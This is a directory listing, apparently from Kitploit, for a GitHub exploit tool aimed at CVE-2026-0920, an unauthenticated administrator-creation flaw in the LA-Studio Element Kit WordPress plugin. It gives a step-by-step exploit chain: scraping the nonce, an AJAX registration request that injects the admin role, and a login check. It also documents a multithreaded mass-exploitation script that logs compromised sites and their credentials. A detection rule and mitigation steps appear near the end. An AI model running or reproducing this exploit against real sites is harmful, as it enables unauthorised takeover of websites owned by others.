Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-0920- — LA-Studio Element Kit per Elementor <= 1.5.6.3 - Escalation dei privilegi non autenticata tramite backdoor per la creazione di utenti amministrativi tramite il parametro lakit_bkrole | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-0920-
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebApprendimento e Formazione
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit per Elementor <= 1.5.6.3 - Escalation dei privilegi non autenticata tramite backdoor per la creazione di utenti amministrativi tramite il parametro lakit_bkrole

Vedi Repository
2134 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalation dei privilegi non autenticata tramite backdoor per la creazione di utenti amministrativi tramite il parametro lakit_bkrole

root@kitploit:~
   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 L'exploit arriva qui per primo. Segui @KNxploited su Telegram — il tuo feed d'élite per CVE appena divulgate, PoC funzionanti e ricerca sulla sicurezza di precisione. Aggiornato senza sosta. Creato per chi vuole restare avanti.


🧠 Panoramica

CVE-2026-0920 è una vulnerabilità CVSS 9.8 Critical scoperta nel plugin WordPress LA-Studio Element Kit for Elementor.

Il difetto risiede nella funzione ajax_register_handle(), che elabora le registrazioni utente non autenticate tramite AJAX. La funzione non impone alcuna restrizione sul parametro lakit_bkrole — consentendo a un attaccante completamente non autenticato di auto-assegnarsi il ruolo administrator durante la registrazione, ottenendo il pieno controllo dell'account admin di WordPress in una singola richiesta.


💀 Analisi approfondita della vulnerabilità

La causa principale è la mancanza di un controllo delle capability del ruolo all'interno del gestore di registrazione AJAX del plugin:

root@kitploit:~
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Perché è critico:

  • wp_ajax_nopriv_* = accessibile da chiunque senza alcuna autenticazione
  • lakit_bkrole accetta qualsiasi stringa di ruolo WordPress — incluso administrator
  • Una singola richiesta POST crea un account admin con pieni privilegi
  • Il nonce richiesto è esposto pubblicamente nell'HTML/JS del front-end del sito
  • Nessun rate limiting, nessun CAPTCHA applicato di default, nessuna verifica email richiesta

⚔️ Catena di exploit

root@kitploit:~
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Requisiti

root@kitploit:~
pip install requests colorama
DipendenzaScopo
requestsRichieste HTTP, gestione della sessione, gestione dei cookie
colorama

Consigliato Python 3.10+ (usa i type hint con unione str | None).


📂 Struttura dei file

root@kitploit:~
CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Utilizzo

Step 1 — Configura le credenziali (Opzionale)

Apri CVE-2026-0920.py e modifica le costanti in cima per impostare i dettagli desiderati dell'account admin:

root@kitploit:~
ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Step 2 — Prepara i target

Crea list.txt con un URL target per riga:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

Gli URL senza schema vengono automaticamente preceduti da https://.


Step 3 — Esegui l'exploit

root@kitploit:~
python CVE-2026-0920.py

Ti verrà chiesto:

root@kitploit:~
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Step 4 — Monitora l'output in tempo reale

Lo script produce un output terminale in tempo reale e codificato a colori:

root@kitploit:~
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
ColoreSignificato

Step 5 — Esamina i risultati

Gli exploit riusciti vengono scritti in success_results.txt:

root@kitploit:~
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3

Ogni riga contiene il quadro completo: target, credenziali, stato del login, stato della risposta AJAX e nonce utilizzato.


🖥️ Riferimento dei parametri dello script


🔬 Logica di verifica

Lo script esegue una verifica in due fasi per eliminare i falsi positivi:

root@kitploit:~
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported

Questo elimina i falsi positivi causati da siti che restituiscono 200 OK sulla chiamata AJAX ma falliscono silenziosamente la registrazione.


📊 Firma di rilevamento

L'exploit genera questo specifico pattern di rete — per difensori e autori di WAF:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}

Regola WAF / IDS (pseudocodice):

root@kitploit:~
IF  request.method == POST
AND request.path   == "/wp-admin/admin-ajax.php"
AND request.body   CONTAINS "lakit_ajax"
AND request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)

🛡️ Mitigazione e correzione

Se sei un proprietario di un sito, uno sviluppatore o un difensore, agisci immediatamente:

  • ✅ Aggiorna LA-Studio Element Kit for Elementor a una versione superiore alla 1.5.6.3
  • ✅ Disattiva ed elimina il plugin finché non viene installata una versione patchata confermata
  • ✅ Controlla tutti gli account amministratore WordPress — rimuovi immediatamente qualsiasi voce non riconosciuta
  • ✅ Applica la validazione del ruolo lato server — non fidarti mai dei valori di ruolo forniti dall'utente senza un controllo tramite whitelist
  • ✅ Blocca le richieste POST non autenticate a admin-ajax.php contenenti lakit_bkrole a livello di WAF
  • ✅ Monitora i log delle attività del server e di WordPress per le chiamate all'azione AJAX lakit_ajax
  • ✅ Attiva l'autenticazione a due fattori su tutti gli account admin esistenti come misura di contenimento
  • ✅ Rivedi l'avviso di Wordfence e applica tutte le misure di hardening raccomandate

⚠️ Disclaimer

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every
    target system you test. No exceptions. No grey areas.

  • You are operating within a formally scoped, authorized penetration
    testing engagement or a controlled lab environment.

  • You will NOT use this tool against any system, network, or
    infrastructure without documented legal permission.

  • Nxploited and all contributors bear ZERO liability for unauthorized
    use, data loss, system damage, legal proceedings, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 Autore

UsernameNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Segui @KNxploited su Telegram CVE appena divulgate. Exploit funzionanti. Ricerca approfondita sulle vulnerabilità. I primi a sapere. I primi ad agire. Non essere l'ultimo.


Progettato con precisione da Nxploited · Solo per ricerca di sicurezza autorizzata · CVSS 9.8 Critical
Scarica lo strumento
CampoDettagli
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versioni interessateTutte le versioni fino alla 1.5.6.3 inclusa
Tipo di vulnerabilitàEscalation dei privilegi non autenticata / Creazione admin
Vettore d'attaccoRete — Nessuna autenticazione richiesta
Punteggio CVSS 3.19.8 CRITICAL
Vettore CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpattoPieno controllo dell'account amministratore WordPress
RicercatoreNxploited
Output terminale colorato su tutte le piattaforme
threadingElaborazione concorrente di più target
reEstrazione del nonce tramite regex da HTML/JS
🔵 Ciano [*]Informativo — passaggio in corso
🟢 Verde [+]Segnale positivo — successo parziale o totale
🟡 Giallo [!]Avviso — risultato ambiguo, da verificare
🔴 Rosso [-]Errore — target non sfruttabile o con errore
ParametroDefaultDescrizione
File dei targetlist.txtFile contenente gli URL dei target
Thread10 (max: 50)Worker concorrenti
ADMIN_EMAIL[email protected]Email per l'account admin iniettato
ADMIN_PASSWORDadminSAPassword per l'account admin iniettato
ADMIN_USERNAMENx_adminUsername per l'account admin iniettato